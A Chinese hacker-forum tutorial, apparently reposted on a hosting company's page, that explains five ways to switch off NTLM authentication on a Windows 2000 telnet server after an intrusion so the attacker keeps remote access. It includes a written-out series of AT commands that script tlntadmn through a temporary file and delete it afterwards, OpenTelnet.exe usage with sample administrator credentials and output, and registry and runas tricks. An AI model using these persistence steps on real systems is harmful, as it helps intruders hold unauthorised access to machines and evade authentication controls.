|
遠(yuǎn)程沖破telnet中NTLM權(quán)限驗證的多種方法
自從上大學(xué)后就很少寫這類文章了��,謹(jǐn)以此文獻(xiàn)給我最愛的爸爸和媽媽,此文章是特別為我的好朋友中國暗域網(wǎng)絡(luò)會員 《閃客幽靈》 所寫,希望能對他有所幫助。感謝大家一如既往的支持中國暗域網(wǎng)絡(luò)����。
原創(chuàng)聲明:
中國暗域網(wǎng)絡(luò)技術(shù)資訊站原創(chuàng)文章,文章作者 冰血封情<EvilOctal>����,勞煩轉(zhuǎn)載請著名出處。我們將盡力將中國暗域網(wǎng)絡(luò)向?qū)W術(shù)性的站點偏移�����。
注意本文是在桂林電子工業(yè)學(xué)院計算機系專用學(xué)生機房做的實驗�,目標(biāo)機器的IP這里定為172.16.93.66。相關(guān)軟件將在文章末尾給出下載地址��。
拙筆正文:
前幾天�,我的一個朋友在我所在的中國暗域網(wǎng)絡(luò)的技術(shù)論壇(forum.hackway.net)問了一個有關(guān)于telnet的問題,我覺得的確是很有代表性��,關(guān)于問題具體內(nèi)容我就不說了����,為了節(jié)省時間空間這里只給出連接關(guān)于telnet中存在的疑問�����。按照中國暗域網(wǎng)絡(luò)的技術(shù)承諾,如果會員問了問題����,凡是有必要的,站里都會專門為這位會員寫一篇文章做詳細(xì)[答疑]�����。由于冰血封情覺得問題太典型����,所以我們單獨做了一個[原創(chuàng)]文章,為的是讓更多的朋友了解這個問題���。至于高手就不用看本文了���,我所寫的也都是笨拙的技巧。
其實�����,這都是入侵后期的一個技巧�����。很多情況下,當(dāng)通過各種方式得到目標(biāo)計算機的權(quán)限之后���,為了方便日后登錄我們通常會利用或者開起一些目標(biāo)計算機的服務(wù)���。telnet便是其中很主要的角色之一。但是眾所周知的是��,一旦telnet服務(wù)開啟了NTLM(NT Lan Manager)身份驗證���,那對入侵者來說是件十分痛苦的事情����。今天我們就來簡單討論一下各種解除NTLM的條件和方法����。
NO1使用榕哥的作品ntlm.exe
感謝:我們中國網(wǎng)絡(luò)安全界優(yōu)秀的程序員小榕,歡迎大家訪問他的站點NetXEyes���,也歡迎大家訪問中國網(wǎng)絡(luò)安全最高學(xué)府安全焦點��,個人比較敬佩小榕前輩����。
如果您知道了一臺主機的管理員權(quán)限����,并確切的知道他的用戶ID和password,而且對方允許網(wǎng)際進(jìn)程連接(ipc$)和AT命令��,那么你可以使用這種方法���,F(xiàn)在先和目標(biāo)計算機建立一個ipc連接����,然后將此文件copy到目標(biāo)計算機上����,然后通過AT命令執(zhí)行就OK了!這個方法應(yīng)該是最方便的了�����,說到頭還是得感謝榕哥�����。這里是淺談����,所以一些實在太過于基礎(chǔ)的步驟我就不詳細(xì)說了�����,如果有疑問��,歡迎訪問中國暗域網(wǎng)絡(luò)技術(shù)論壇�����。
NO2通過自己編寫batch文件
感謝:其實這種方法N早就在《黑客X檔案》上有人寫過�,我只是綜合一下�����,不知道會不會有'版權(quán)糾紛'��?哈……不閑扯��。這里很感謝2002年8月《黑客X檔案》第43頁文章《徒手屏蔽遠(yuǎn)程telnet服務(wù)的ntlm認(rèn)證》的作者h(yuǎn)eikeangel���。
這個方法的實現(xiàn)條件和NO1相同���。那么看看原文中heikeangel是怎么說的呢
……大家可以看一下Win2000和NT4自帶的tlntadmn這個命令���,它是用來控制臺修改telnet設(shè)置的。很可惜�����,這是一個控制臺的交互式工具���,所以at命令沒有辦法直接調(diào)用。現(xiàn)在我們執(zhí)行一下tlntadmn���,然后按照以下的順序操作:停止服務(wù)(5)->更改設(shè)置(3)->NTLM(7)->確認(rèn)更改(y)->修改NTLM當(dāng)前值(0)->再次確認(rèn)(y)->退出菜單(0)->啟動服務(wù)(4)->退出程序(0)……
好了按照所提示的方法����,這里我們就編寫一個批處理文件�,首先用AT命令取得對方系統(tǒng)時間。假設(shè)得到對方時間為20:11��,然后鍵入……
at \\172.16.93.66 20:18 "echo 5 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 3 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 7 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo y >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 0 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo y >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 0 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 4 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 0 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "c:\winnt\system32\tlntadmn.exe < c:\evilin.txt"
at \\172.16.93.66 20:18 "del c:\evilin.txt /f"
然后再用AT命令執(zhí)行at 172.16.93.66 20:18 tlntadmn,c:\evilin.txt就一切搞掂了��!
NO3通過工具opentelnet.exe
感謝:工具OpenTelnet.exe和ResumeTelnet.exe的作者refdom前輩��,他的文章WIN2K的Telnet服務(wù)Hacking吐血推薦閱讀。當(dāng)然也歡迎訪問中國網(wǎng)絡(luò)安全最高學(xué)府安全焦點���。
如果您知道了一臺主機的管理員權(quán)限�,并確切的知道他的用戶ID和password���,并且對方還沒開telnet��,那么我們就厚起臉皮用高手寫的工具開始吧�����。具體過程refdom前輩已經(jīng)很詳細(xì)的介紹在文章中了�。(為了方便和本文的結(jié)合��,我修改了target IP希望refdom前輩理解)
Opentelnet.exe的用法:
OpenTelnet.exe \\server <帳號> <密碼> <NTLM認(rèn)證方式> <Telnet端口>
比如下面的:(命令意思是連接172.16.93.66�����,帳號administrator���,密碼123456 ���,0表示不使用NTLM認(rèn)證方式�����,
Telnet的端口是90)
C:\>OpenTelnet.exe \\172.16.93.66 administrator 123456 0 90
當(dāng)程序運行后得到:
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
就說明Telnet服務(wù)啟動成功���,并且使用的端口是90。這樣�����,我們就能夠得到一個開90端口的Windows 2000 Telnet服務(wù)器���。
Telnet 172.16.93.66
就可以登錄上去了,而且不使用 NTLM認(rèn)證方式����。
ResumeTelnet.exe,是用來恢復(fù)Telnet配置的��,并關(guān)閉Telnet服務(wù)器����,它的用法是:
ResumeTelnet.exe \\ip <帳號> <密碼>
例如:
C:\>ResumeTelnet.exe \\172.16.93.66 administrator 123456
如果程序運行后顯示:
BINGLE!!!
The config of remote telnet server is resumed!
Disconnecting server...Successfully!
就說明服務(wù)器端Telnet 的配置又返回到原來的狀態(tài)中了。
再次以最高的敬意感謝refdom前輩�。
NO4利用遠(yuǎn)程注冊表實現(xiàn)
如果您知道了一臺主機的管理員權(quán)限�����,并確切的知道他的用戶ID和password�����,并且對方開啟了遠(yuǎn)程注冊表服務(wù)和telnet服務(wù)�。
首先我們和172.16.93.66建立ipc$連接���,然后啟動本地的注冊表編輯器��,選擇"工具"中的"連接網(wǎng)絡(luò)注冊表"�,在出現(xiàn)的連接對話框中輸入172.16.93.66����,回車后進(jìn)入遠(yuǎn)程注冊表,找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0下的NTLM鍵值���,將其修改為0或者1�,完成后斷開所有連接�����,只要對方重新啟動后就徹底擺平!
NO5利用系統(tǒng)新建用戶
如果您知道了一臺主機的管理員權(quán)限���,并確切的知道他的用戶ID和password���,并且對方開啟了telnet服務(wù)。那么我們來介紹一下這種方法……大體上的目標(biāo)是在本地建立一個和對方帳號同名同權(quán)限的帳號����,以這種修改連接身份的方法來繞過驗證。
這里具體方法如下���。首先照上面所說的建立一個符合要求的用戶����,這里我們把叫做"跳板"用戶����,然后在c:\WINNT\SYSTEM32\cmd.exe上單擊右鍵選擇"屬性"����,在"屬性"選項卡中勾選"以其他用戶身份運行","確定"后��,雙擊運行它,輸入你所建立的那個"跳板"用戶的ID和password���,然后直接可以在這個cmd.exe中實現(xiàn)Telnet而不需要NTLM身份驗證了��。多爽��������?
本文就寫到這里,這只是平時積累的點知識��,拿出來給大家分享�����,本文完全免費投放于網(wǎng)絡(luò)��。希望我的拙劣技巧能給大家一點啟迪�,開放出更新的方法,歡迎來中國暗域網(wǎng)絡(luò)和我討論�����,我是菜鳥冰血封情。由于本人的水平不濟(jì)���,文章有不到之處���,請高手斧正!再次感謝所有為中國網(wǎng)絡(luò)安全發(fā)展做出貢獻(xiàn)的高手和前輩們��,你們是偉大的��。enjoy it! Good luck: )
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【www.allwellnessguide.com】
服務(wù)器租用/服務(wù)器托管中國五強!虛擬主機域名注冊頂級提供商�!15年品質(zhì)保障!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國服務(wù)器租用
電信骨干機房
聯(lián)通骨干機房
0371-60135900
